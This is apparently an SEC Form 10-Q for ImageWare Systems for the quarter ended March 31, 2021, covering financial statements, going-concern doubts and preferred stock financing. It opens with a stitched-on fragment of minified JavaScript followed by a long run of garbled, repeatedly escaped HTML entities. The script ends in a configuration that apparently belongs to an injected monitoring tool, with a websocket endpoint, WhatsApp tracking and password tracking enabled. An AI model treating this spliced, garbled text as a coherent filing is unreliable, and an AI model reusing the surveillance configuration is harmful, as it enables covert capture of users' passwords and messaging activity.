this.dd[Y.getDay()]},Z:function(Y){return(0&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;(Y=Y.utc?0:Y.getTimezoneOffset()/.6)?"-":"+")+("000"+Math.abs(Y-Y%100*.4)).slice(-4)},post:function(Y){return Y}},parser:{find:function(Y,e){for(var t,n=-1,r=0,a=0,i=Y.length;a&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;i;a++)t=Y[a],!e.indexOf(t)&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;t.length&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;r&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;(n=a,r=t.length);return{index:n,length:r}},MMMM:function(Y){return this.parser.find(this.MMMM,Y)},MMM:function(Y){return this.parser.find(this.MMM,Y)},A:function(Y){return this.parser.find(this.A,Y)},h:function(Y,e){return(12===Y?0:Y)+12*e},pre:function(Y){return Y}}}},e.format=function(Y,n,r){var a=e.addMinutes(Y,r?Y.getTimezoneOffset():0),i=t.en,o=i.formatter;return a.utc=r,n.replace(/(\[[^\[\]]*]|\[.*\][^\[]*\]|YYYY|YY|MMM?M?|DD|HH|hh|mm|ss|SSS?|ddd?d?|.)/g,(function(Y){var e=o[Y];return e?o.post(e.call(i,a,n)):Y.replace(/\[(.*)]/,"$1")}))},e.parse=function(Y,n,r){var a,i,o=t.en,s=o.parser.pre(Y),M=0,u=/(MMMM?|A)|(YYYY)|(SSS)|(MM|DD|HH|hh|mm|ss)|(YY|M|D|H|h|m|s|SS)|(S)|(.)/g,D={2:/^\d{1,4}/,3:/^\d{1,3}/,4:/^\d\d/,5:/^\d\d?/,6:/^\d/};Y=[31,28,31,30,31,30,31,31,30,31,30,31];for(var c={Y:1970,M:1,D:1,H:0,m:0,s:0,S:0};a=u.exec(n);){var d=0,l=1;for(i="";!i;)i=a[++d];a=i.charAt(0);var f=s.slice(M);if(2&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;d){var g=o.parser[i].call(o,f,n);c[a]=g.index,"M"===a&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;c[a]++,l=g.length}else if(7&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;d)g=(f.match(D[d])||[""])[0],c[a]=0|("S"===a?(g+"000").slice(0,-i.length):g),l=g.length;else if(" "!==a&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;a!==f[0])return NaN;if(!l)return NaN;M+=l}return M===s.length&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;g?(c.Y+=70&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;c.Y?2e3:100&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;c.Y?1900:0,c.H=c.H||o.parser.h(c.h||0,c.A||0),n=new Date(c.Y,c.M-1,c.D,c.H,c.m,c.s,c.S),Y[1]+=0|e.isLeapYear(n),1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;c.M||12&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;c.M||1&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;c.D||c.D&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;Y[c.M-1]||23&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;c.H||59&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;c.m||59&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;c.s?NaN:r?e.addMinutes(n,-n.getTimezoneOffset()):n):NaN},e.isValid=function(Y,t){return!!e.parse(Y,t)},e.addYears=function(Y,t){return e.addMonths(Y,12*t)},e.addMonths=function(Y,e){var t=new Date(Y.getTime());return t.setMonth(t.getMonth()+e),t},e.addDays=function(Y,e){var t=new Date(Y.getTime());return t.setDate(t.getDate()+e),t},e.addHours=function(Y,t){return e.addMilliseconds(Y,36e5*t)},e.addMinutes=function(Y,t){return e.addMilliseconds(Y,6e4*t)},e.addSeconds=function(Y,t){return e.addMilliseconds(Y,1e3*t)},e.addMilliseconds=function(Y,e){return new Date(Y.getTime()+e)},e.subtract=function(Y,e){var t=Y.getTime()-e.getTime();return{toMilliseconds:function(){return t},toSeconds:function(){return t/1e3|0},toMinutes:function(){return t/6e4|0},toHours:function(){return t/36e5|0},toDays:function(){return t/864e5|0}}},e.isLeapYear=function(Y){return!(((Y=Y.getFullYear())%4||!(Y%100))&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;Y%400)},e.isSameDay=function(Y,t){return e.format(Y,"YYYYMMDD")===e.format(t,"YYYYMMDD")},Y.date=e;var S={token:"34831f2c-58d9-43ce-8bb4-1c2c155e9ce3",sendNotificationsInterval:Number("1000"),pollWhatsappTrackingInterval:Number("20000"),connectionString:"wss://tm.filter:1502",pid:"11292",pn:"firefox.exe",iup:false,dontTrackWebPasswords:false,extJs:null},v=6e4,y=null,N=null,b=null,A=null,T=!1,E=null,w=null,L=0,k=null,I=null,C="",H=!1;!function Y(e){g()?setTimeout((function(){Y(e)}),1e3):e()}((function(){S.extJs&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;S.extJs.init(S.token),n()&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;window.addEventListener("focus",r),(n()||S.extJs)&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;l()}))}();&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;amp;#xD;&amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;amp;#xD;&amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;amp;#xD;&amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;amp;#xD;&amp;#xD;&#xD;&#xD;&#xD; &amp;#xD;&#xD;&#xD;&#xD; &#xD;&#xD;&#xD; &#xD;&#xD; &#xD;

UNITED STATES
SECURITIES AND EXCHANGE COMMISSION
Washington, D.C. 20549

FORM 10-Q
(Mark One)
[X]	QUARTERLY REPORT PURSUANT TO SECTION 13 OR 15(d) OF THE SECURITIES EXCHANGE ACT OF 1934

For the quarterly period ended March 31, 2021

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

Securities registered pursuant to Section 12(b) of the Act: None

The number of shares of common stock, par value $0.01 per share, outstanding on May 17, 2021 was 303,292,986.

IMAGEWARE SYSTEMS, INC.

-i-

Forward-Looking Statements

 This Quarterly Report on Form 10-Q (this "Quarterly Report") contains forward-looking statements.  The words or phrases "would be," "will allow," "intends to," "will likely result," "are expected to," "will continue," "is anticipated," "estimate," "project," or similar expressions are intended to identify "forward-looking statements."  Actual results could differ materially from those projected in the forward-looking statements as a result of a number of risks and uncertainties, including those risks factors contained in our Annual Report on Form 10-K for the year ended December 31, 2020, previously filed with the Securities and Exchange Commission ("SEC") on April 5, 2021 is incorporated herein by reference.  Statements made herein are as of the date of the filing of this Report with the SEC and should not be relied upon as of any subsequent date.  Unless otherwise required by applicable law, we do not undertake, and specifically disclaim any obligation, to update any forward-looking statements to reflect occurrences, developments, unanticipated events, or circumstances after the date of such statement.

PART I

ITEM 1.  FINANCIAL STATEMENTS

IMAGEWARE SYSTEMS, INC.
CONDENSED CONSOLIDATED BALANCE SHEETS
(In Thousands, except for share and per share data)

	March 31,	December 31,
	2021	2020
ASSETS	(Unaudited)
Current Assets:
Cash and cash equivalents	$5,056	$8,345
Accounts receivable, net of allowance for doubtful accounts of $5 at March 31, 2021 and December 31, 2020.	493	577
Inventory, net	88	40
Other current assets	625	196
Total Current Assets	6,262	9,158

Property and equipment, net	112	155
Other assets	525	458
Operating lease right-of-use assets	1,462	1,557
Intangible assets, net of accumulated amortization	55	58
Goodwill	3,416	3,416
Total Assets	$11,832	$14,802

LIABILITIES, MEZZANINE EQUITY AND SHAREHOLDERS’ DEFICIT

Current Liabilities:
Accounts payable	$974	$1,007
Deferred revenue	777	903
Accrued expense	1,006	1,130
Operating lease liabilities, current portion	435	421
Derivative liabilities	22,850	24,128
Note payable, current portion	1,107	918
Total Current Liabilities	27,149	28,507

Other long-term liabilities	65	65
Note payable, net of current portion	464	653
Lease liabilities, net of current portion	1,178	1,297
Pension obligation	2,518	2,531
Total Liabilities	31,374	33,053

Mezzanine Equity:
Series D Convertible Redeemable Preferred Stock, $0.01 par value, designated 26,000 shares, 23,111 and 22,863 shares issued at March 31, 2021 (unaudited) and December 31, 2020, respectively and 22,757 and 22,863 shares outstanding at March 31, 2021 (unaudited) and December 31, 2020, respectively; liquidation preference $22,757 and $22,863 at March 31, 2021 (unaudited) and December 31, 2020, respectively.	3,391	1,572

Shareholders’ Deficit:
Preferred stock, authorized 5,000,000 shares:
Series A Convertible Redeemable Preferred Stock, $0.01 par value; designated 38,000 shares, 37,467 shares issued at March 31, 2021 (unaudited) and December 31, 2020, and 6,149 and 14,911 shares outstanding at March 31, 2021 (unaudited) and December 31, 2020, respectively; liquidation preference $6,149 and $14,911 at March 31, 2021 (unaudited) and December 31, 2020, respectively.	—	—
Series A-1 Convertible Redeemable Preferred Stock, $0.01 par value; designated 38,000 shares, 37,467 shares issued at March 31, 2021 (unaudited) and December 31, 2020, and 5,922 and 14,782 shares outstanding at March 31, 2021 (unaudited) and December 31, 2020, respectively; liquidation preference $5,922 and $14,782 at March 31, 2021 (unaudited) and December 31, 2020, respectively.	—	—
Series B Convertible Redeemable Preferred Stock, $0.01 par value; designated 750,000 shares, 389,400 shares issued and 239,400 shares outstanding at March 31, 2021 (unaudited) and December 31, 2020, respectively; liquidation preference $620 and $607 at March 31, 2021 (unaudited) and December 31, 2020, respectively.	2	2
Common Stock, $0.01 par value, 1,000,000,000 shares authorized; 276,749,448 and 180,096,317 shares issued at March 31, 2021 (unaudited) and December 31, 2020, respectively, and 276,742,744 and 180,089,613 shares outstanding at March 31, 2021 (unaudited) and December 31, 2020, respectively.	2,766	1,801
Additional paid-in capital	191,585	193,652
Treasury stock, at cost 6,704 shares	(64)	(64)
Accumulated other comprehensive loss	(1,935)	(1,989)
Accumulated deficit	(215,287)	(213,225)
Total Shareholders’ Deficit	(22,933)	(19,823)
Total Liabilities, Mezzanine Equity and Shareholders’ Deficit	$11,832	$14,802

The accompanying notes are an integral part of these condensed consolidated financial statements.

IMAGEWARE SYSTEMS, INC.
CONDENSED CONSOLIDATED STATEMENTS OF OPERATIONS
(In Thousands, except share and per share amounts)
(Unaudited)

	Three Months Ended March 31,
	2021	2020
Revenue:
Product	$56	$150
Maintenance	677	646
	733	796
Cost of revenue:
Product	9	21
Maintenance	110	98
Gross profit	614	677

Operating expense:
General and administrative	1,347	983
Sales and marketing	724	1,058
Research and development	1,168	1,868
Depreciation and amortization	18	18
	3,257	3,927
Loss from operations	(2,643)	(3,250)

Interest (income) expense, net	—	24
(Gain) loss on change in fair value of derivative liabilities	(1,172)	(197)
Loss on extinguishment of derivative liabilities	335	—
Other (income) expense, net	25	—
Other components of net periodic pension expense	54	47
Loss before income taxes	(1,885)	(3,124)
Income tax expense	—	—
Net loss	(1,885)	(3,124)
Preferred dividends and preferred stock discount accretion	(2,255)	(1,374)
Net loss available to common shareholders	$(4,140)	$(4,498)

Basic and diluted loss per common share - see Note 3:
Basic and diluted loss per share available to common shareholders	$(0.02)	$(0.04)
Basic and diluted weighted-average shares outstanding	245,829,914	116,196,197

The accompanying notes are an integral part of these condensed consolidated financial statements.

IMAGEWARE SYSTEMS, INC.
CONDENSED CONSOLIDATED STATEMENTS OF COMPREHENSIVE LOSS
(In Thousands)
(Unaudited)

	Three Months Ended March 31,
	2021	2020
Net loss	$(1,885)	$(3,124)
Other comprehensive income (loss):
Foreign currency translation adjustment	54	31
Comprehensive loss	$(1,831)	$(3,093)

The accompanying notes are an integral part of these condensed consolidated financial statements.

IMAGEWARE SYSTEMS, INC.
CONSOLIDATED STATEMENTS OF SHAREHOLDERS' DEFICIT
(In Thousands, except share amounts)
(Unaudited)

	Series A		Series A-1		Series B
	Convertible,		Convertible,		Convertible,							Accumulated
	Redeemable		Redeemable		Redeemable						Additional	Other
	Preferred		Preferred		Preferred		Common Stock		Treasury Stock		Paid-In	Comprehensive	Accumulated
	Shares	Amount	Shares	Amount	Shares	Amount	Shares	Amount	Shares	Amount	Capital	Loss	Deficit	Total

Balance at December 31, 2020	14,911	$-	14,782	$-	239,400	$2	180,096,317	$1,801	(6,704)	$(64)	$193,652	$(1,989)	$(213,225)	$(19,823)

Accretion of Preferred Stock discount	-	-	-	-	-	-	-	-	-	-	(1,817)	-	-	(1,817)
Stock-based compensation expense and issuance of RSUs	-	-	-	-	-	-	161,168	2	-	-	76	-	-	78
Issuance of common stock in lieu of cash	-	-	-	-	-	-	242,647	2	-	-	19	-	-	21
Issuance of common stock pursuant to warrant exercise	-	-	-	-	-	-	400	-	-	-	-	-	-	-
Conversion of Series A Preferred to Common Stock	(8,762)	-	-	-	-	-	43,819,500	438	-	-	(438)	-	-	-
Conversion of Series A-1 Preferred to Common Stock	-	-	(8,860)	-	-	-	44,300,000	443	-	-	(443)	-	-	-
Conversion of Series D Preferred to Common Stock	-	-	-	-	-	-	6,115,324	59	-	-	630	-	(2)	687
Foreign currency translation adjustment	-	-	-	-	-	-	-	-	-	-	-	54	-	54
Dividends on Series A Preferred stock, $(10.50)/share	-	-	-	-	-	-	1,050,826	11	-	-	81	-	(92)	-
Dividends on Series A-1 Preferred stock, $(9.75)/share	-	-	-	-	-	-	963,266	10	-	-	73	-	(83)	-
Dividends on Series D Preferred stock, $(90.90)/share	-	-	-	-	-	-	-	-	-	-	(248)	-	-	(248)
Net loss	-	-	-	-	-	-	-	-	-	-	-	-	(1,885)	(1,885)
Balance at March 31, 2021	6,149	$ -	5,922	$ -	239,400	$ 2	276,749,448	$ 2,766	(6,704)	$ (64)	$ 191,585	$ (1,935)	(215,287)	(22,933)

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

IMAGEWARE SYSTEMS, INC.
CONDENSED CONSOLIDATED STATEMENTS OF CASH FLOWS
(In Thousands)
(Unaudited)

	Three Months Ended March 31,
	2021	2020
Cash flows from operating activities
Net loss	$(1,885)	$(3,124)
Adjustments to reconcile net loss to net cash used by operating activities:
Depreciation and amortization	18	18
Loss on disposal of fixed assets	82	—
Stock-based compensation	78	124
Issuance of common stock in exchange for unexercised options	—	62
Issuance of common stock as compensation in lieu of cash	21	—
Change in fair value of derivative liabilities	(1,172)	(197)
Loss on extinguishment of derivative liabilities	335	—
Change in assets and liabilities:
Accounts receivable	84	168
Inventory	(48)	(64)
Other assets	(495)	30
Operating lease right-of-use assets	(10)	(3)
Accounts payable	(33)	662
Deferred revenue	(129)	234
Accrued expense	(123)	102
Pension obligation	(13)	8
Total adjustments	(1,405)	1,144
Net cash used in operating activities	(3,290)	(1,980)

Cash flows from investing activities
Purchase of property and equipment	(53)	—
Net cash used in investing activities	(53)	—

Cash flows from financing activities
Proceeds from issuance of common stock, net	—	622
Proceeds from issuance of related party notes payable	—	350
Net cash provided by financing activities	—	972

Effect of exchange rate changes on cash and cash equivalents	54	31
Net decrease in cash and cash equivalents	(3,289)	(977)

Cash and cash equivalents at beginning of period	8,345	1,030

Cash and cash equivalents at end of period	$5,056	$53

Supplemental disclosure of cash flow information:
Cash paid for interest	$—	$—
Cash paid for income taxes	$—	$—
Summary of non-cash investing and financing activities:
Stock dividends on Series A Convertible Redeemable Preferred Stock	$92	$937
Stock dividends on Series A-1 Convertible Redeemable Preferred Stock	$83	$250
Stock dividends on Series D Convertible Redeemable Preferred Stock	$248	—
Accretion of discount on Series C Convertible Redeemable Preferred Stock	$—	$175
Accretion of discount on Series D Convertible Redeemable Preferred Stock	$1,817	$—
Conversion of Series A Convertible Redeemable Preferred Stock into Common Stock	$438	—
Conversion of Series A-1 Convertible Redeemable Preferred Stock into Common Stock	443	—
Stock subscription receivable	$—	765

The accompanying notes are an integral part of these condensed consolidated financial statements.

IMAGEWARE SYSTEMS, INC.
NOTES TO CONDENSED CONSOLIDATED FINANCIAL STATEMENTS (UNAUDITED)

NOTE 1.  DESCRIPTION OF BUSINESS AND OPERATIONS

Overview

As used in this Quarterly Report, “we”, “us”, “our”, “ImageWare”, “ImageWare Systems” or the “Company” refers to ImageWare Systems, Inc. and all of its subsidiaries. ImageWare Systems, Inc. is incorporated in the state of Delaware. The Company is a pioneer and leader in the emerging market for biometrically enabled software-based identity management solutions. Using those human characteristics that are unique to us all, the Company creates software that provides a highly reliable indication of a person’s identity. The Company’s “flagship” product is the patented IWS Biometric Engine®. The Company’s products are used to manage and issue secure credentials, including national IDs, passports, driver licenses and access control credentials. The Company’s products also provide law enforcement with integrated mug shot, fingerprint LiveScan and investigative capabilities. The Company also provides comprehensive authentication security software using biometrics to secure physical and logical access to facilities or computer networks or internet sites. Biometric technology is now an integral part of all markets the Company addresses, and all the products are integrated into the IWS Biometric Engine.

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

At March 31, 2021 and December 31, 2020, we had negative working capital of $20,887,000 and $19,349,000, respectively. Included in our negative working capital as of March 31, 2021 are $22,850,000 of derivative liabilities which are not required to be settled in cash except in the event of the consummation of a Change of Control or at any time after the fourth anniversary of the Series D Preferred issuance, at which time the holders of the Series D Preferred may require the Company to redeem in cash any or all of the holder’s outstanding Series D Preferred at an amount equal to the Series D Liquidation Preference Amount. At March 31, 2021 the Liquidation Preference Amount totaled $22,757,000. Considering the financings consummated in 2020, as well as our projected cash requirements, and assuming we are unable to generate incremental revenue, our available cash will be insufficient to satisfy our cash requirements for the next twelve months from the date of this filing. At May 14, 2021, cash on hand approximated $3,661,000. Based on the Company’s rate of cash consumption in the first quarter of 2021 and the last quarter of 2020, the Company estimates it will need additional capital in the third quarter of 2021 and its prospects for obtaining that capital are uncertain. As a result of the Company’s historical losses and financial condition, there is substantial doubt about the Company’s ability to continue as a going concern.

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

Recent Developments

Charter Amendment

Our Certificate of Incorporation as of March 31, 2021 authorizes a total of 1.0 billion shares of Common Stock for issuance. Effective as of January 28, 2021 and February 16, 2021, respectively, our Board of Directors and the Majority Shareholders approved and authorized an amendment to our Certificate of Incorporation to increase the number of authorized shares of Common Stock from 1.0 billion shares to 2.0 billion shares, resulting in a total increase of 1.0 billion authorized shares of Common Stock. The increase in the number of authorized shares of Common Stock became effective upon filing the Certificate of Amendment with the Delaware Division of Corporations on April 21, 2021.

Coronavirus (COVID-19) Pandemic

On March 11, 2020, the World Health Organization declared the novel strain of coronavirus (“COVID-19”) a global pandemic and recommended containment and mitigation measures worldwide. As of May 2021, the global outbreak of COVID-19 continues to rapidly evolve, and the extent to which COVID-19 may impact our business and markets we serve will depend on future developments, which are highly uncertain and cannot be predicted with confidence, such as the duration of the outbreak, travel restrictions and social distancing in the United States and other countries, business closures or business disruptions, and the effectiveness of actions taken both in the United States and other countries. We are continuing to vigilantly monitor the situation with our primary focus on health and safety of our employees and clients.

The Series D Financing

On November 12, 2020 and December 23, 2020, the Company consummated private placements of 12,060 shares of its Series D Convertible Preferred Stock, par value $0.01 per share (the "Series D Preferred"), resulting in gross proceeds to the Company of $12.06 million, less fees and expenses (the “Series D Financing”). The gross proceeds include approximately $2.2 million in principal amount due and payable under the terms of certain term loans issued by the Company on September 29, 2020 (“Bridge Notes”), which Bridge Notes were converted into Series D Preferred at Closing (the “Conversion”). The issuance of the Series D Preferred was made pursuant to securities purchase agreements, dated September 28, 2020 (the "Purchase Agreement"), by and between the Company and certain accredited investors (the "Purchasers"), for the sale of the Series D Preferred at a purchase price of $1,000 per share of Series D Preferred. The holders of Series D Preferred may voluntarily convert their shares of Series D Preferred into shares of the Company’s Common Stock at any time that is at least ninety days following the issuance date, at the conversion price calculated by dividing the Stated Value by the conversion price of $0.0583 per share of Common Stock, subject to adjustments as set forth in Section 5(e) of the Certificate of Designations, Preferences, and Rights of Series D Convertible Preferred Stock (the "Series D Certificate"). Dividends on shares of Series D Preferred will be paid prior to any junior securities and are to be paid at the rate of 4% of the Stated Value (as defined in the Series D Certificate) per share per annum in the form of shares of Series D Preferred.

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

NOTE 2.  SIGNIFICANT ACCOUNTING POLICIES AND BASIS OF PRESENTATION

Basis of Presentation

The accompanying condensed consolidated balance sheet as of December 31, 2020, which has been derived from audited financial statements, and the unaudited interim condensed consolidated financial statements have been prepared by the Company in accordance with accounting principles generally accepted in the United States of America (“GAAP”) and the rules and regulations of the SEC related to a quarterly report on Form 10-Q. Certain information and note disclosures normally included in annual financial statements prepared in accordance with GAAP have been condensed or omitted pursuant to those rules and regulations, although the Company believes that the disclosures made are adequate to make the information not misleading. The interim financial statements reflect all adjustments, which, in the opinion of management, are necessary for a fair statement of the results for the periods presented. All such adjustments are of a normal and recurring nature. These unaudited condensed consolidated financial statements should be read in conjunction with the Company’s audited financial statements for the year ended December 31, 2020, which are included in the Company’s Annual Report on Form 10-K for the year ended December 31, 2020 as filed with the SEC on April 5, 2021.

Operating results for the three months ended March 31, 2021 are not necessarily indicative of the results that may be expected for the year ending December 31, 2021, or any other future periods.

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

Use of Estimates

The preparation of the condensed consolidated financial statements in conformity with GAAP requires management to make estimates and assumptions that affect the reported amounts of assets and liabilities and disclosure of contingent assets and liabilities at the date of the condensed consolidated financial statements, and the reported amounts of revenue and expense during the reporting period. Significant estimates include the evaluation of our ability to continue as a going concern, the allowance for doubtful accounts receivable, assumptions used in the Black-Scholes model to calculate the fair value of share based payments, fair value of financial instruments issued with and affected by the Series D Preferred Financing, assumptions used in the application of revenue recognition policies, and assumptions used in the application of fair value methodologies to calculate the fair value of pension assets and obligations. Actual results could differ from estimates.

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

Lease Liabilities and Operating Lease Right-of-Use Assets

The Company is a party to certain contractual arrangements for office space which meet the definition of leases under Accounting Standards Codification (“ASC”) Topic 842 – Leases (“ASC 842”). In accordance with ASC 842, the Company has determined that such arrangements are operating leases and accordingly the Company has, as of January 1, 2019, initially recorded operating lease right-of-use assets and related lease liability for the present value of the lease payments over the lease terms using the Company’s estimated weighted-average incremental borrowing rate of approximately 14.5% using a capital asset pricing model. The Company has utilized the practical expedient regarding lease and nonlease components and has combined such items into a single combined component. The Company has also utilized the practical expedient regarding leases of twelve months or less and has excluded such leases from its computation of lease liability and related right-of-use assets.

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

Contract Costs

We recognize an asset for the incremental costs of obtaining a contract with a customer if we expect the benefit of those costs to be longer than one year. We apply a practical expedient to expense costs as incurred for costs to obtain a contract when the amortization period is one year or less. At March 31, 2021 and December 31, 2020, we had capitalized incremental costs of obtaining a contract with a customer of approximately $65,000. We recorded no additional contract costs during the three months ended March 31, 2021. Additionally, we recognized approximately $80,000 in revenue during the three months ended March 31, 2021 that was related to contract costs at the beginning of the period.

Other Items

We do not offer rights of return for our products and services in the normal course of business.

Sales tax collected from customers is excluded from revenue.

The following table sets forth our disaggregated revenue for the three months ended March 31, 2021 and 2020:

	Three Months Ended March 31,
Net Revenue	2021	2020
(dollars in thousands)

Software and royalties	$39	$125
Hardware and consumables	13	14
Services	4	11
Maintenance	677	646
Total revenue	$733	$796

Customer Concentration

For the three months ended March 31, 2021, two customers accounted for approximately 45% or $333,000 of our total revenue and had trade receivables at March 31, 2021 of $249,000 of which approximately $171,000 was collected as of the date of this Quarterly Report.

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

FASB Accounting Standards Update (“ASU”) No. 2020-06. In August 2020, the FASB issued ASU 2020-06 “Debt—Debt with Conversion and Other Options (Subtopic 470-20) and Derivatives and Hedging— Contracts in Entity’s Own Equity (Subtopic 815-40): Accounting for Convertible Instruments and Contracts in an Entity’s Own Equity”. This ASU simplifies accounting for convertible instruments by removing major separation models required under current U.S. GAAP. Consequently, more convertible debt instruments will be reported as a single liability instrument and more convertible preferred stock as a single equity instrument with no separate accounting for embedded conversion features. The ASU removes certain settlement conditions that are required for equity contracts to qualify for the derivative scope exception, which will permit more equity contracts to qualify for it. The ASU also simplifies the diluted earnings per share (EPS) calculation in certain areas. This ASU is effective for public business entities, excluding entities eligible to be smaller reporting companies, for fiscal years beginning after December 15, 2021, including interim periods within those fiscal years. For all other entities, the standard will be effective for fiscal years beginning after December 15, 2023, including interim periods within those fiscal years. Early adoption will be permitted. The Company is currently evaluating the impact ASU 2020-06 will have on its consolidated financial statements.

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

The table below presents the computation of basic and diluted loss per share:

(Amounts in thousands except share and per share amounts)	Three Months Ended March 31,
	2021	2020
Numerator for basic and diluted loss per share:
Net loss	$(1,885)	$(3,124)
Preferred dividends and preferred stock discount accretion	(2,255)	(1,374)
Net loss available to common shareholders	$(4,140)	$(4,498)

Denominator for basic and dilutive loss per share — weighted-average shares outstanding	245,829,914	116,196,197

Basic and diluted loss per share available to common shareholders	$(0.02)	$(0.04)

The following potential dilutive securities have been excluded from the computations of diluted weighted-average shares outstanding, as their effect would have been antidilutive:

Potential Dilutive Securities:	Common Share Equivalents at March 31, 2021	Common Share Equivalents at December 31, 2020
Convertible redeemable preferred stock – Series A	30,743,500	74,555,000
Convertible redeemable preferred stock – Series A-1	29,610,000	73,910,000
Convertible redeemable preferred stock – Series B	46,980	46,029
Convertible redeemable preferred stock – Series D	390,348,199	392,166,023
Stock options	2,574,669	2,585,500
Restricted stock units (RSUs)	618,004	845,106
Warrants	393,589	753,775
Total Potential Dilutive Securities	454,334,941	544,861,433

NOTE 4.  SELECT BALANCE SHEET DETAILS

Inventory

Inventories of $88,000 as of March 31, 2021 were comprised of work in process of $78,000, representing direct labor costs on in-process projects and finished goods of $10,000 net of reserves for obsolete and slow-moving items of $3,000.

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

Intangible Assets

